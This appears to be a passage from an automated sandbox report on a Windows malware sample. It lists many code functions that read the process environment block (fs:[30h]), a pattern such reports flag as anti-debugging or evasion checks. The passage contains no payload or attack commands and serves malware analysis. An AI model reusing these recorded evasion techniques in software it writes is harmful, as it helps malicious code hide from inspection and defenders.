      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D806CC0 mov eax, dword ptr fs:[00000030h]4_2_1D806CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C8C3D mov eax, dword ptr fs:[00000030h]4_2_1D7C8C3D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D809CCF mov eax, dword ptr fs:[00000030h]4_2_1D809CCF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CCD1 mov ecx, dword ptr fs:[00000030h]4_2_1D80CCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CCD1 mov eax, dword ptr fs:[00000030h]4_2_1D80CCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CCD1 mov eax, dword ptr fs:[00000030h]4_2_1D80CCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D863CD4 mov eax, dword ptr fs:[00000030h]4_2_1D863CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D863CD4 mov eax, dword ptr fs:[00000030h]4_2_1D863CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D863CD4 mov ecx, dword ptr fs:[00000030h]4_2_1D863CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D863CD4 mov eax, dword ptr fs:[00000030h]4_2_1D863CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D863CD4 mov eax, dword ptr fs:[00000030h]4_2_1D863CD4
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4CD2 mov eax, dword ptr fs:[00000030h]4_2_1D8A4CD2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E3C20 mov eax, dword ptr fs:[00000030h]4_2_1D7E3C20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]4_2_1D7EAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]4_2_1D7EAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]4_2_1D7EAC20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FECF3 mov eax, dword ptr fs:[00000030h]4_2_1D7FECF3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FECF3 mov eax, dword ptr fs:[00000030h]4_2_1D7FECF3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7CF1 mov eax, dword ptr fs:[00000030h]4_2_1D7C7CF1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3CF0 mov eax, dword ptr fs:[00000030h]4_2_1D7D3CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D3CF0 mov eax, dword ptr fs:[00000030h]4_2_1D7D3CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802C10 mov eax, dword ptr fs:[00000030h]4_2_1D802C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802C10 mov eax, dword ptr fs:[00000030h]4_2_1D802C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802C10 mov eax, dword ptr fs:[00000030h]4_2_1D802C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802C10 mov eax, dword ptr fs:[00000030h]4_2_1D802C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F8CDF mov eax, dword ptr fs:[00000030h]4_2_1D7F8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F8CDF mov eax, dword ptr fs:[00000030h]4_2_1D7F8CDF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]4_2_1D7EDCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]4_2_1D7EDCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]4_2_1D7EDCD1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D895C38 mov eax, dword ptr fs:[00000030h]4_2_1D895C38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D895C38 mov ecx, dword ptr fs:[00000030h]4_2_1D895C38
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7DFCC9 mov eax, dword ptr fs:[00000030h]4_2_1D7DFCC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]4_2_1D7C6CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]4_2_1D7C6CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]4_2_1D7C6CC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D804C3D mov eax, dword ptr fs:[00000030h]4_2_1D804C3D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D853C57 mov eax, dword ptr fs:[00000030h]4_2_1D853C57
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4C59 mov eax, dword ptr fs:[00000030h]4_2_1D8A4C59
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D7C95 mov eax, dword ptr fs:[00000030h]4_2_1D7D7C95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D7C95 mov eax, dword ptr fs:[00000030h]4_2_1D7D7C95
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BC6E mov eax, dword ptr fs:[00000030h]4_2_1D80BC6E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BC6E mov eax, dword ptr fs:[00000030h]4_2_1D80BC6E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]4_2_1D7C7C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]4_2_1D7C7C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]4_2_1D7C7C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]4_2_1D7C7C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]4_2_1D7C7C85
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]4_2_1D7CEF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]4_2_1D7CEF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]4_2_1D7CEF79
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBF70 mov eax, dword ptr fs:[00000030h]4_2_1D7CBF70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1F70 mov eax, dword ptr fs:[00000030h]4_2_1D7D1F70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FAF72 mov eax, dword ptr fs:[00000030h]4_2_1D7FAF72
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F8B mov eax, dword ptr fs:[00000030h]4_2_1D858F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F8B mov eax, dword ptr fs:[00000030h]4_2_1D858F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F8B mov eax, dword ptr fs:[00000030h]4_2_1D858F8B
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D808FBC mov eax, dword ptr fs:[00000030h]4_2_1D808FBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]4_2_1D7EDF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]4_2_1D7EDF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]4_2_1D7EDF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]4_2_1D7EDF36
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CFF30 mov edi, dword ptr fs:[00000030h]4_2_1D7CFF30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D851FC9 mov eax, dword ptr fs:[00000030h]4_2_1D851FC9
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov eax, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov eax, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov eax, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov ecx, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov eax, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FFDC mov eax, dword ptr fs:[00000030h]4_2_1D84FFDC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EFD3 mov eax, dword ptr fs:[00000030h]4_2_1D88EFD3
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4FFF mov eax, dword ptr fs:[00000030h]4_2_1D8A4FFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7ECF00 mov eax, dword ptr fs:[00000030h]4_2_1D7ECF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7ECF00 mov eax, dword ptr fs:[00000030h]4_2_1D7ECF00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7F8FFB mov eax, dword ptr fs:[00000030h]4_2_1D7F8FFB
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FF03 mov eax, dword ptr fs:[00000030h]4_2_1D84FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FF03 mov eax, dword ptr fs:[00000030h]4_2_1D84FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D84FF03 mov eax, dword ptr fs:[00000030h]4_2_1D84FF03
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BF0C mov eax, dword ptr fs:[00000030h]4_2_1D80BF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BF0C mov eax, dword ptr fs:[00000030h]4_2_1D80BF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80BF0C mov eax, dword ptr fs:[00000030h]4_2_1D80BF0C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4F1D mov eax, dword ptr fs:[00000030h]4_2_1D8A4F1D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D810F16 mov eax, dword ptr fs:[00000030h]4_2_1D810F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D810F16 mov eax, dword ptr fs:[00000030h]4_2_1D810F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D810F16 mov eax, dword ptr fs:[00000030h]4_2_1D810F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D810F16 mov eax, dword ptr fs:[00000030h]4_2_1D810F16
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]4_2_1D7E6FE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7C9FD0 mov eax, dword ptr fs:[00000030h]4_2_1D7C9FD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov eax, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov eax, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov ecx, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D858F3C mov ecx, dword ptr fs:[00000030h]4_2_1D858F3C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBFC0 mov eax, dword ptr fs:[00000030h]4_2_1D7CBFC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88BF4D mov eax, dword ptr fs:[00000030h]4_2_1D88BF4D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D4FB6 mov eax, dword ptr fs:[00000030h]4_2_1D7D4FB6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]4_2_1D7FCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]4_2_1D7FCFB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1FAA mov eax, dword ptr fs:[00000030h]4_2_1D7D1FAA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88AF50 mov ecx, dword ptr fs:[00000030h]4_2_1D88AF50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FBF93 mov eax, dword ptr fs:[00000030h]4_2_1D7FBF93
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D88EF66 mov eax, dword ptr fs:[00000030h]4_2_1D88EF66
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov ecx, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]4_2_1D7E0F90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8A4F7C mov eax, dword ptr fs:[00000030h]4_2_1D8A4F7C
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D1E70 mov eax, dword ptr fs:[00000030h]4_2_1D7D1E70
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]4_2_1D7CBE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]4_2_1D7CBE60
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D80CEA0 mov eax, dword ptr fs:[00000030h]4_2_1D80CEA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D890EAD mov eax, dword ptr fs:[00000030h]4_2_1D890EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D890EAD mov eax, dword ptr fs:[00000030h]4_2_1D890EAD
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7FEE48 mov eax, dword ptr fs:[00000030h]4_2_1D7FEE48
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802EB8 mov eax, dword ptr fs:[00000030h]4_2_1D802EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D802EB8 mov eax, dword ptr fs:[00000030h]4_2_1D802EB8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDE45 mov eax, dword ptr fs:[00000030h]4_2_1D7CDE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CDE45 mov ecx, dword ptr fs:[00000030h]4_2_1D7CDE45
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CFE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CFE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]4_2_1D7CAE40
